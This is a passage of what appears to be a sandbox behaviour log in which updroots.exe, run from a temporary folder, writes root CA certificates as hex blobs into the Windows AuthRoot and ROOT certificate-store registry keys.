fd0ac187f878122fea9dd07966d7cf84ed94d3a5069d5417ec5da74d88e73e57e83e1c31981b7bdbf408ebe2e9aa20caa4e022ebb2ae1085d3103c9ac27b0afdcd5c8147d409d558921f990ccd4c9604173abe8cdd83a55390a8299fe9bf5f53c1c91cbc0fa4654ae21fc2aac5c7bde7a9771fd6c6bcd489aa4db817c18372f907d6194bd17c95cb6541677ca094aaae9bc4f9475015a56bc92d28fb9d797de567401f7167149b1f518469941ee62e1b32c65756929724303f89b1ffa38f49eec40108eac97d5b033be9f18dc2df74178544a6244e70203010001a38201fd308201f9300e0603551d0f0101ff040403020106301806082b06010505070103040c300a3008060604008e460101300f0603551d130101ff040530030101ff301d0603551d0e04160414ccc3f566ff73ac385a961b2189b8814c1fcb5e25301006092b06010401823715010403020100308201890603551d20048201803082017c30820178060b2b0601040181c459010102308201673082013806082b060105050702023082012a1e82012600530069007300200069007200200073006500720074006900660069006b006100740073002c0020006b006f00200069007a0064006500760069007300200056004100530020004c0061007400760069006a00610073002000500061007300740073002c0020006e006f00640072006f00730069006e006f007400200061007400620069006c0073007400690062007500200045006c0065006b00740072006f006e00690073006b006f00200064006f006b0075006d0065006e007400750020006c0069006b0075006d0061006d00200075006e0020004500690072006f0070006100730020005000610072006c0061006d0065006e0074006100200064006900720065006b0074006900760061006900200031003900390039002f00390033002f0045004b302906082b06010505070201161d687474703a2f2f7777772e652d6d652e6c762f7265706f7369746f7279300d06092a864886f70d010105050003820201001f284a35902163680a2f78afa31e822697a33f2719d24ba3427a0613655bc104cbeb7d7cef94f2f189f5b7df52022169d2ea9634e5a0cf97b89c550e1085a3145e2c05f8b53a76f3f97ab8deb60c2769f2cb94910b1db9d58e6f992fcdf21956393a4856f001ff8275b6b2fdd1d4f5f263574c4da17ecc10ba0469eff414fcb3971f45ee6f4a287fd1c627bcc7a3a96b7bed82136fabde0ffb71eb5c111aa92cd0309ffc363756ef95e9bab713b6ae9f0261ad9eec6b046f369f0f99f7c2c9c84c28b928d421d79e54d5c0cef48ee455947b8f24c638fcab7aa456773da845ef6492a4d04a7ebb738bf40d5273b83a485e4380d3a9707762ffc7281c731e43e627245b49b9e636a48efdc52d2f7aa579127ad721b2256dc80fa2c3614be548e257ba9ff28a21dddb64f0da19dfcec09b8039c277776315537284faa48f073786217d50fa3d6a37db910e37b3fdce0bca7b61d09c749c7d38686de97b1dd6f12ab4ef3b60527705e602c25f8c5bbcf07db773c7916bb22ab363a334d5abad257147ff1a3e7ab68d9576c3eea6cd03096cee456798cf994876c1ce8a749a6852013422c8ede2140b84bd6e108cb1729bbee808d757d57feab4013d4ee4e2e867e78c7ee9e74211ef9546c891d6be271780193498e7c6df1efc215f9e863dbc7ef09cbd729ef447825b7167f3fadc544ca85cd859c7d0070e133327bcf469f06b21 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\093C61F38B8BDC7D55DF7538020500E125F5C836 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\89DF74FE5CF40F4A80F9E3377D54DA91E101318E C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\535B001672ABBF7B6CC25405AE4D24FE033FD1CC C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\C4674DDC6CE2967FF9C92E072EF8E8A7FBD6A131\Blob = 030000000100000014000000c4674ddc6ce2967ff9c92e072ef8e8a7fbd6a13109000000010000005c000000305a06082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b0601050507030906082b0601050507030606082b0601050507030706082b060105050802020b000000010000002600000050006f00730074002e0054007200750073007400200052006f006f00740020004300410000002000000001000000bf040000308204bb308203a3a003020102020439a69715300d06092a864886f70d01010505003056310b30090603550406130249453110300e060355040a1307416e20506f737431183016060355040b130f506f73742e5472757374204c74642e311b301906035504031312506f73742e547275737420526f6f74204341301e170d3037303730353039313430385a170d3232303730353039313233335a3056310b30090603550406130249453110300e060355040a1307416e20506f737431183016060355040b130f506f73742e5472757374204c74642e311b301906035504031312506f73742e547275737420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100d67f13e40d24d8d8fbe9b6c3b152a34edcb73be2f70e5f81e601f0a6e63670d81373a1ff520890f215bcf2321ca8d7e106107b41a894c73f3d4415dc8051e730fe5348f5905f6d6d25e060bba0fbd6c629f84d70501a37a00ecd782ab668f399d40c8e5e1262ffc25f5a9a2b8847aabba1d975f02c5cfe6dc2b15b31cc83871aa7be900ee8105453520b9c49f38002fe6f27a6a35730b8dbb8d0000403e4e5d44306ebab684d6826d29934b9e012967f4bbb6b6e2171e608454a1d660d37c903e1d1cadcb12f70f6b78162961b64a7febbe186eb419fa89cd8caa0e1d62ff80fe1ba4038f76dd1a5ca4c19c896dccc491c0ab6d3a8913af9daec1dcd734a243f0203010001a382018f3082018b300f0603551d130101ff040530030101ff308201260603551d200482011d308201193082011506072a8274bbe82201308201083081cd06082b060105050702023081c01a81bd4973737565642061732061206365727469666963617465207375626a65637420746f20506f73742e547275737420435053207768696368206c696d6974732077617272616e7469657320616e64206c696162696c697479206f6620506f73742e5472757374204c696d697465642e20427920616363657074696e672c207468652072656c79696e672070617274792061636b6e6f776c656467657320697420686173207265616420616e6420616363657074656420746865204350532e303606082b06010505070201162a20687474703a2f2f7777772e706f73742e74727573742e69652f7265706f7369742f6370732e68746d6c300e0603551d0f0101ff0404030201c6301f0603551d230418301680148ea173f93a0321f02c578b0e020be39e0bb39d97301d0603551d0e041604148ea173f93a0321f02c578b0e020be39e0bb39d97300d06092a864886f70d010105050003820101008f2e610c79941a20fa3c7e1c3230eb9deeee832bcc6c2649ed554ddff47df2bc35147ae7f3051c7c0986962b6547fa58ef492169a46650b0c5d79cb4e23193889dee50125e5b688f46e73473be256110d41e3515bdbbbb0427039da7611e6a7e3f9fd70a99a2ca0a3256c73d64c1183c13d0361dd540c7de187cae53784072959da83d3a35b00296965a75ba86bed89f2ab6440d5b75ef5dd91cff3b66c48f0771b94cd9d544fc2318260d55193d1394f61d7066b9e5549c39aa6c0d034097a9f42ad5a6e676368a4a0227e81b1992fd7aa7b764b50e63baff7bdbe510b7e08175e051aeb20d7febc67e9861dd028057b76d389d29ddf43a01d7746cd0c95b78 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5D003860F002ED829DEAA41868F788186D62127F C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3B1EFD3A66EA28B16697394703A72CA340A05BD5 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\8EB03FC3CF7BB292866268B751223DB5103405CB\Blob = 0b000000010000006c0000004a006100700061006e002000430065007200740069006600690063006100740069006f006e002000530065007200760069006300650073002c00200049006e0063002e0020005300650063007500720065005300690067006e00200052006f006f0074004300410033000000090000000100000016000000301406082b0601050507030406082b060105050703010300000001000000140000008eb03fc3cf7bb292866268b751223db5103405cb20000000010000002d030000308203293082021102085f60585f00000000300d06092a864886f70d01010505003057310b3009060355040613024a50312b3029060355040a13224a6170616e2043657274696669636174696f6e2053657276696365732c20496e632e311b3019060355040313125365637572655369676e20526f6f74434133301e170d3939303931353135303030315a170d3230303931353134353935395a3057310b3009060355040613024a50312b3029060355040a13224a6170616e2043657274696669636174696f6e2053657276696365732c20496e632e311b3019060355040313125365637572655369676e20526f6f7443413330820122300d06092a864886f70d01010105000382010f003082010a0282010100995e1e8096662364ce9c8c003e0aaf08e9b804e084b86d53754d36a8b5e0d78c4e6055b603979b5a1aa7f3ba3dd99a9431767423c9f7ec125dd820d41de91ba23776040f3eac16693be1ff102f5625e433501309cc4e0eabf0e475db71d5fc4acdeddb0f350515d5b0667b427b26e559e2b5c7c0b2c7a143fd0f2f0b8325255781bbbbd13530749190b28f9f68d5d243b7b245a923c056d88712d373fecb59eaaffce71f5e54451caa6d9593624742415e4feb36070e2878540a7cc0c32413860302b9ac76924a5addc5dcecf8b3db2bb51b36e778824c957e2056b2751c7d97ef7f943829a200e2d1eab1e33436314058b8aab7ce811a0c17810dfdebb8d3bd0203010001300d06092a864886f70d010105050003820101008e9884d61b8d81acd0037ae839bc4de5126aafaa7260317f1a2c7a617e3c4c9c1c6a5c4cd13d96590b2f91b1adf3e1a8d29fc18b76dc8fac30a9b02bda65d6a38edc504b564d42454a121d61952b9a9d8264155df5fbc016b3370f03aa1b8055390046d294882e2cb4cdab5bb5e9cb9be65f30bed0745e9b102f80753f09f92ee1661f596ced6f2e3e3ba7249034bbe490a74bc82f79295f36681e1d1a156ae0df2b8141c63b4a4691bfca937be1912c2d3c075f02ac7b9e4e0dad3e5ce41c68229fcf81b17b6f98cda138f3d4892543844f4ee26e5e24245d94c239cfa5f9716018fa4ac9e4007c5efd8952b76d8277786fad45c672d1804da50543edcbe2b3 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\55A6723ECBF2ECCDC3237470199D2ABE11E381D1\Blob = 53000000010000002400000030223020060a2b06010401bd470d180130123010060a2b0601040182373c0101030200c00b000000010000003c00000054002d00540065006c006500530065006300200047006c006f00620061006c00200052006f006f007400200043006c0061007300730020003300000009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030903000000010000001400000055a6723ecbf2eccdc3237470199d2abe11e381d12000000001000000c7030000308203c3308202aba003020102020101300d06092a864886f70d01010b0500308182310b3009060355040613024445312b3029060355040a0c22542d53797374656d7320456e746572707269736520536572766963657320476d6248311f301d060355040b0c16542d53797374656d732054727573742043656e7465723125302306035504030c1c542d54656c6553656320476c6f62616c526f6f7420436c6173732033301e170d3038313030313130323935365a170d3333313030313233353935395a308182310b3009060355040613024445312b3029060355040a0c22542d53797374656d7320456e746572707269736520536572766963657320476d6248311f301d060355040b0c16542d53797374656d732054727573742043656e7465723125302306035504030c1c542d54656c6553656320476c6f62616c526f6f7420436c617373203330820122300d06092a864886f70d01010105000382010f003082010a0282010100bd7593f062226f24aee07a76ac7dbdd924d5b8b7fccdf042e0eb7888565e9b9a541d4d0c8af6d3cf70f452b5d89304e3468671414a2bf02a2c5503d648c3e03938edf25c3c3f44bc933d61ab4ecd0dbef02027580e447f041a87a5d796143690d0497ba175fb1a6b73b1f8cea9092cf253d5c31444b886a5f68b2b39daa33354d9fa721af722151c88916b7f66e5c36a80b024f3df864588fd197f75871f1fb11b0a73245bb965e02c54c860d366173fe1cc54337391023aa67f7b7639a21f96b638aeb5c893741d9eb9b4e5609d2f56d1e0eb5e5b4c12700c6c4420ab11d8f419f6d29c5237e7fab6c2313b4ad41499adc71af55d5ffa07b87c0d1fd6831eb30203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414b503f7763b61826a12aa1853eb032194bffececa300d06092a864886f70d01010b05000382010100563def94d5bdda73b258beae90ad982797fe01b1b05200b84de41b21741b7ec0ee5e692a25af5cd61ddad279c9f39729e08687de04590ff159d464854b99af25041ec946a997de82b21b709f9cf6af7131dd7b05a52cd3b9ca47f6caf2f6e7adb9483fbc16b7c16df4ea09afecf3b5e7059ea61e8a5351d69381cc7493f6b9daa6250574795a7e403e824b2611306ee13f41c7470035d5f5d3f7543e813dda496a9ab3ef103de6eb6fd1c82247cbcccf013192d918e322be091e1a3e5ab2e46b0c547a7d434eb889a57bd7a23d9686ccf226342d6a929d9a1ad030e25d4e04b05f8b207e77c13d9582d1469a3b3c78b86fa1d00d64a2781e294e93c3a454145b C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\585F7875BEE7433EB079EAAB7D05BB0F7AF2BCCC C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000002a000000302806082b0601050507030106082b0601050507030406082b0601050507030206082b060105050703030b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c020000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\E12DFB4B41D7D9C32B30514BAC1D81D8385E2D46 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\3A44735AE581901F248661461E3B9CC45FF53A1B C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\3E84D3BCC544C0F6FA19435C851F3F2FCBA8E814 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5A5A4DAF7861267C4B1F1E67586BAE6ED4FEB93F C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\85A408C09C193E5D51587DCDD61330FD8CDE37BF\Blob = 0b0000000100000036000000440065007500740073006300680065002000540065006c0065006b006f006d00200052006f006f007400200043004100200032000000090000000100000020000000301e06082b0601050507030406082b0601050507030106082b0601050507030203000000010000001400000085a408c09c193e5d51587dcdd61330fd8cde37bf2000000001000000a30300003082039f30820287a003020102020126300d06092a864886f70d01010505003071310b3009060355040613024445311c301a060355040a131344657574736368652054656c656b6f6d204147311f301d060355040b1316542d54656c655365632054727573742043656e746572312330210603550403131a44657574736368652054656c656b6f6d20526f6f742043412032301e170d3939303730393132313130305a170d3139303730393233353930305a3071310b3009060355040613024445311c301a060355040a131344657574736368652054656c656b6f6d204147311f301d060355040b1316542d54656c655365632054727573742043656e746572312330210603550403131a44657574736368652054656c656b6f6d20526f6f74204341203230820122300d06092a864886f70d01010105000382010f003082010a0282010100ab0ba335e08b2914b11485af3c10e4396f355d4aaeddea618d9549f46f64a31a6066a4a9402284d9d4a5e578930e6801adb94d5c3aced3b8a84240dfcfa3ba82596a921bac1c9ada082b2527f9692347f1e0eb2c7a9bf51302d07e347cc29e3c0059abf5da0cf5323c2bac50dad6c3de8394caa80c99320e0848565b6afbdae1585801495f72413c1506018e5dadaab893b4cd9eeba7e86a2d5234db3aef5c7551dadbf331f9ee719832c45415440cf99b55edaddf1808a0a3868a49ee53058f194cd5de58799bd26a1c42abc5d5a7cf680f96e4e161987661c8917cd63e00e2915087e19d0ae6ad97d21dc63a7dcbbcda0334d58e5b01f56a07b716b66e4a7f0203010001a3423040301d0603551d0e0416041431c3791bbaf553d717e0897a2d176c0ab32b9d33300f0603551d13040830060101ff020105300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100946459ad3964e729eb13fe5ac38b1357c80424f07477c060e367fbe989a683bf96827c6ed4c33def9e806ebb29b4987ab13b54eb3917477e1a8e0bfc1f31593104b2ce17f32cc7623655e222d88955b49848aa64fad61c36d844785a5a233a5797f57a304fae9f6a4c4b2b8ea003e33ee0a9d4d27bd2b3a8e2723cad9eff8059e49b45b4f63bb0cd39199832e5ea216190e431218e34b1f72f354a8510dae78a3721be5963e0f285883153d45414857079f42e067727752f1fb88af9fec5bad836e483ece765b7bf635af346af819437d4418cd623d61ecff5681b4463a25abaa73559a1e570059b0e235799940a6dba3963288692f31884d8fbd1cf05566457 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\7998A308E14D6585E6C21E153A719FBA5AD34AD9 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D2EDF88B41B6FE01461D6E2834EC7C8F6C77721E\Blob = 030000000100000014000000d2edf88b41b6fe01461d6e2834ec7c8f6c77721e090000000100000016000000301406082b0601050507030406082b060105050703010b0000000100000038000000430065007200740050006c0075007300200043006c006100730073002000330020005000720069006d0061007200790020004300410000002000000001000000950300003082039130820279a003020102021059dfac7e8a661511e58824ceefa9bca9300d06092a864886f70d0101050500303d310b30090603550406130246523111300f060355040a130843657274706c7573311b301906035504031312436c6173732033205072696d617279204341301e170d3939303730373137303830305a170d3139303730363233353935395a303d310b30090603550406130246523111300f060355040a130843657274706c7573311b301906035504031312436c6173732033205072696d61727920434130820122300d06092a864886f70d01010105000382010f003082010a0282010100b794306ed04cd97e5e60e56fbb26ca526f6b6c8599a50bef001a6f1b4d58b51807fadd7bf8cb2c52ddfc9cb88d52e9b9b20b7cf58f5b99480958decd4895862589053427300b57b60c776329cb6caa3eb99951120d987076474cf949962208f96beaaa0036a315a71c1e9f8cca5a797b21da891f637e799250090428adcee36d04494a99b13f4509785820ef8dfe80c804ed292ca0588d840225973fa013d77b8b23e39fb8c7b84240381b924abd4a9455c756150d8177cc9fa237892b5b850d8b77f8c48bfb10cb94c7e91a5612976614c4bbd77d6d021bbf71622618e9498afaa3dee184ad80ca4ae2228c6a086183b222c7098838565dd131abf0099f13590203010001a3818c308189300f0603551d13040830060101ff02010a300b0603551d0f040403020106301d0603551d0e041604146a643676509c4ef4f74f15f50ded332560eccb20301106096086480186f842010104040302010630370603551d1f0430302e302ca02aa0288626687474703a2f2f7777772e63657274706c75732e636f6d2f43524c2f636c617373332e63726c300d06092a864886f70d010105050003820101009aa13e38aee152d2450dd1e98363ad8c80f493c3b8c23a229727b251863ed2f297de7cbbd7964053ca52aa8a6c63ccba718ae2f0f0108a17b04f8fc6ef0e31305a8dad04c7ab8c5f1a08cf9a179946be8e6b4a6a7f0147692518f84e3c4a042b06f210003dff3ea5e80ecf703886bbc58e0cd6e24b4b66f3735f80b53bf11229ea73bc689e1c60f7f3aa42d816c868de730b3f40c17777541d94572901935b98c36b04fa7c298dac47f0fe55154baf7123f5c3ce0167932680acf4828ac41b404adcc6390a6e63b6644d7ace90aa99bd36fd59fc2ffc45bede8e3359fa8a0b0f30364de35bb5d69650d7bffe85dcdab4822bcc1b083ff19a4eb5e18f08612416 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B435D4E1119D1C6690A749EBB394BD637BA782B7\Blob = 030000000100000014000000b435d4e1119d1c6690a749ebb394bd637ba782b709000000010000003e000000303c06082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030906082b0601050507030306082b060105050703080b00000001000000640000005400550052004b0054005200550053005400200045006c0065006b00740072006f006e0069006b00200053006500720074006900660069006b0061002000480069007a006d006500740020005300610067006c00610079006900630069007300690000002000000001000000400400003082043c30820324a003020102020101300d06092a864886f70d01010505003081be313f303d06035504030c3654c39c524b545255535420456c656b74726f6e696b20536572746966696b612048697a6d6574205361c49f6c6179c4b163c4b173c4b1310b3009060355040613025452310f300d06035504070c06416e6b617261315d305b060355040a0c5454c39c524b54525553542042696c676920c4b06c657469c59f696d2076652042696c69c59f696d2047c3bc76656e6c69c49f692048697a6d65746c65726920412ec59e2e20286329204b6173c4b16d2032303035301e170d3035313130373130303735375a170d3135303931363130303735375a3081be313f303d06035504030c3654c39c524b545255535420456c656b74726f6e696b20536572746966696b612048697a6d6574205361c49f6c6179c4b163c4b173c4b1310b3009060355040613025452310f300d06035504070c06416e6b617261315d305b060355040a0c5454c39c524b54525553542042696c676920c4b06c657469c59f696d2076652042696c69c59f696d2047c3bc76656e6c69c49f692048697a6d65746c65726920412ec59e2e20286329204b6173c4b16d203230303530820122300d06092a864886f70d01010105000382010f003082010a0282010100a9367ec391434cc3199808c8c7587b4f168ca5ce49011f730eac7513a6fa9e2c20ded8900e0ad169d227fbaa779f275225e2cb5dd8d88350177d8ab5823f048eb4d5f049a764b71e2e5f209c50754fafe1b54114f4989288c7e5e56447614779fdc051f1c199e7dcce6afbafb50130dc461cef8aec95efdcffaf101ceb9dd8b0aa6a85180d17c93ebff19bd0098942fda042b49d89515529cf1b70bc8454adc1131f98f42e76608b5d3f9aadca0cbfa7565b8f77b8d59e7949923fe0f197247a6c9b170f6def5398912be40fbe59790778bb9795f49f69d458870aa9e3ccb658199f2621b1c4598db24175c0ad69ce9c0008f236ff3ef0a10f1aac14fda6600f0203010001a3433041301d0603551d0e04160414d937b34e05fdd9cf9f1216aeb6892feb253a881c300f0603551d0f0101ff04050303070600300f0603551d130101ff040530030101ff300d06092a864886f70d01010505000382010100726096b7c9dcd8295e23855fb2b32d76fb88d717fe7b6d45b8f6856c9f22fc2a1022ecaab930f6ab58d6391031992900bd896641fb74de91c1180b9fb561cb9d3abef5a894a322556e1749ffd229f138265defa5aa3af9717be6da581dd374c201fa3e69585fadcb68be142e9b6cc0b6dca026fa771ae224da1a37e067add173830da51a1d6e12927e84620017bdbc251857f2d7a96f5988bc34b72e85789d96dc14c32c8a529b968c52663d86168b47b851098cea7dcd8872b36033b1f00a44ef0ff5093788240e2c6b203aa2fa11f240359c4468633bac336f63bc2cbbf2d2cb767d7d88d81dc8051d6ebc94a9668c7771c7fa91fa2f519ee93952b6e70442 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3B1EFD3A66EA28B16697394703A72CA340A05BD5\Blob = 0300000001000000140000003b1efd3a66ea28b16697394703a72ca340a05bd50b00000001000000540000004d006900630072006f0073006f0066007400200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790020003200300031003000000069000000010000000e000000300c060a2b0601040182373c03022000000001000000f1050000308205ed308203d5a003020102021028cc3a25bfba44ac449a9b586b4339aa300d06092a864886f70d01010b0500308188310b3009060355040613025553311330110603550408130a57617368696e67746f6e3110300e060355040713075265646d6f6e64311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e31323030060355040313294d6963726f736f667420526f6f7420436572746966696361746520417574686f726974792032303130301e170d3130303632333231353732345a170d3335303632333232303430315a308188310b3009060355040613025553311330110603550408130a57617368696e67746f6e3110300e060355040713075265646d6f6e64311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e31323030060355040313294d6963726f736f667420526f6f7420436572746966696361746520417574686f72697479203230313030820222300d06092a864886f70d01010105000382020f003082020a0282020100b9089e28e4e4ec064e5068b341c57bebaeb68eaf81ba22441f6534694cbe704017f2167be279fd86ed0d39f41ba8ad92901ecb3d768f5ad9b591102e3c058d8a6d2454e71fed56ad83b4509c15a51774885920fc08c58476d368d46f2878ce5cb8f3509044ffe3635fbea19a2c961504d607fe1e8421e0423111c4283694cf50a4629ec9d6ab7100b25b0ce696d40a2496f5ffc6d5b71bd7cbb72162af12dca15d37e31afb1a4698c09bc0e7631f2a0893027e1e6a8ef29f1889e42285a2b1845740fff50ed86f9cede2453101cd17e97fb08145e3aa214026a172aaa74f3c01057eee8358b15e06639962917882b70d930c246ab41bdb27ec5f95043f934a30f59718b3a7f919a793331d01c8db22525cd725c946f9a2fb875943be9b62b18d2d86441a46ac78617e3009faae89c4412a2266039139459cc78b0ca8ca0d2ffb52ea0cf76333239dfeb01fad67d6a75003c6047063b52cb1865a43b7fbaef96e296e21214126068cc9c3eeb0c28593a1b985d9e6326c4b4c3fd65da3e5b59d77c39cc055b77400e3b838ab839750e19a42241dc6c0a330d11a5ac85234f773f1c7181f33ad7aeccb4160f3239420c24845ac5c51c62e80c2e27715bd8587ed369d9691ee00b5a370ec9fe38d80688376baaf5d70522216e266fbbab3c5c2f73e2f77a6cadec1a6c6484cc3375123d327d7b84e7096f0a14476af78cf9ae166130203010001a351304f300b0603551d0f040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414d5f656cb8fe8a25c6268d13d94905bd7ce9a18c4301006092b06010401823715010403020100300d06092a864886f70d01010b05000382020100aca5968cbfbbaea6f6d7718743315688fd1c32715b35b7d4f091f2af37e214f1f30226053e16147f14bab84ffb89b2b2e7d409cc6db95b3b64657066b7f2b15adf1a02f3f551b8676d79f3bf567be484b92b1e9b409c2634f947189869d81cd7b6d1bf8f61c267c4b5ef60438e101b3649e420caada7c1b1276509f8cdf55b2ad08433f3ef1ff2f59c0b589337a075a0de72de6c752a6622f58c0630569f40b930aa40771582d78becc0d3b2bd83c5770c1eaeaf1953a04d79719f0faf30ce67f9d62ccc22417a07f2974218ce59791055de6f10e4b8da836640160968235b972e269a02bb578cc5b8ba69623280899ea1fdc0927c7b2b3319842a63c5006862fa9f478d997a453aa7e9edee6942b5f3819b4756107bfc7036841873eaeff9974d9e3323dd260bba2ab73f44dc8327ffbd61592b11b7ca4fdbc58b0c1c31ae32f8f8b942f77fdc619a76b15a04e1113d6645b71871bec92485d6f3d4ba41345d122d25b98da613486d4bb0077d99930961817457268aab69e3e4d9c788cc24d8ec52245c1ebc9114e296deeb0ada9edd5fb35bdbd482ecc620508725403afbc7eecdfe33e56ec3840955032539c0e9355d6531a8f6bfa009cd29c7b336322edc95f383c15acf8b8df6eab321f8a4ed1e310eb64c11ab600ba412232217a3366482910412e0ab6f1ecb500561b440ff598671d1d533697ca9738a38d7640cf169 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\60D68974B5C2659E8A0FC1887C88D246691B182C\Blob = 0b00000001000000580000005300650063007200e90074006100720069006100740020004700e9006e00e900720061006c0020006400650020006c00610020004400e900660065006e007300650020004e006100740069006f006e0061006c0065000000090000000100000074000000307206082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030606082b0601050507030706082b0601050508020206082b06010505070308060a2b0601040182370a0304060a2b0601040182370a030c06082b0601050507030903000000010000001400000060d68974b5c2659e8a0fc1887c88d246691b182c20000000010000000604000030820402308202eaa00302010202053911451094300d06092a864886f70d0101050500308185310b3009060355040613024652310f300d060355040813064672616e6365310e300c0603550407130550617269733110300e060355040a1307504d2f5347444e310e300c060355040b13054443535349310e300c060355040313054947432f413123302106092a864886f70d010901161469676361407367646e2e706d2e676f75762e6672301e170d3032313231333134323932335a170d3230313031373134323932325a308185310b3009060355040613024652310f300d060355040813064672616e6365310e300c0603550407130550617269733110300e060355040a1307504d2f5347444e310e300c060355040b13054443535349310e300c060355040313054947432f413123302106092a864886f70d010901161469676361407367646e2e706d2e676f75762e667230820122300d06092a864886f70d01010105000382010f003082010a0282010100b21fd1d062c5333bc0048688b3dcf